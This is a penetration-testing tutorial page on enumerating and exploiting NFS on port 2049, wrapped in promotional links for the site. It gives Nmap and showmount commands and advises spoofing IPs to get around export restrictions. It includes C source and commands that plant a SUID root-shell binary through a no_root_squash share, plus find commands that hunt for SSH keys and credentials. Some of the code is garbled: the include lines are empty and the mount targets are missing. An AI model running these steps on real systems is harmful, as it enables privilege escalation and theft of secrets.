# NFS Service - Port 2049 {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} ## Basic info The **Network File System (NFS)** allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements. ### Identifying NFS Services During Network Reconnaissance #### Port Scanning and Service Enumeration NFS uses the following ports: * **TCP/UDP 2049** – NFS Service * **TCP/UDP 111** – Portmapper (rpcbind) Run a detailed Nmap scan: ```bash nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs ``` Check for exposed mount points and exports. *** ### Enumerating NFS Exports #### Using `showmount` Check accessible NFS shares: ```bash showmount -e ``` Example output: ``` Export list for 10.0.0.1: /home * /var/nfs 192.168.0.0/24 ``` * `*` means accessible from any host * CIDR indicates trusted networks #### Bypassing IP-based Access Controls Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place. *** ## Mounting NFS Shares and Privilege Analysis ### Mounting an Export Locally ```bash mkdir /mnt/nfs mount -t nfs :/home /mnt/nfs ``` Check for files with improper permissions or user credentials. ### UID/GID Mappings and Root Squashing By default, NFS applies **root squashing**: remote root becomes `nfsnobody`. Check `/etc/exports` configuration for `no_root_squash` option: ``` /home *(rw,sync,no_root_squash) ``` If `no_root_squash` is set, root access is preserved, allowing privilege escalation. *** ## Exploiting no\_root\_squash for Remote Code Execution ### Step-by-Step Attack 1. **Create a SUID Binary on Mounted Share** ```bash echo -e '#include \n#include \n#include \nint main(){setuid(0); system("/bin/bash");}' > rootsh.c gcc rootsh.c -o rootsh chmod +s rootsh mv rootsh /mnt/nfs/ ``` 2. **Trigger Execution on Target**\ If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login. 3. **Gain Shell with Root Privileges** *** ## Enumerating and Extracting Sensitive Files ### Commands to Discover Valuable Files ```bash find /mnt/nfs -type f -name "*.conf" find /mnt/nfs -type f -name "*.pem" find /mnt/nfs -type f -perm -4000 ``` Look for: * SSH private keys * Database credentials * Password backup files * Misconfigured `.bashrc`, `.profile`, or crontabs *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech 🎉 * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %}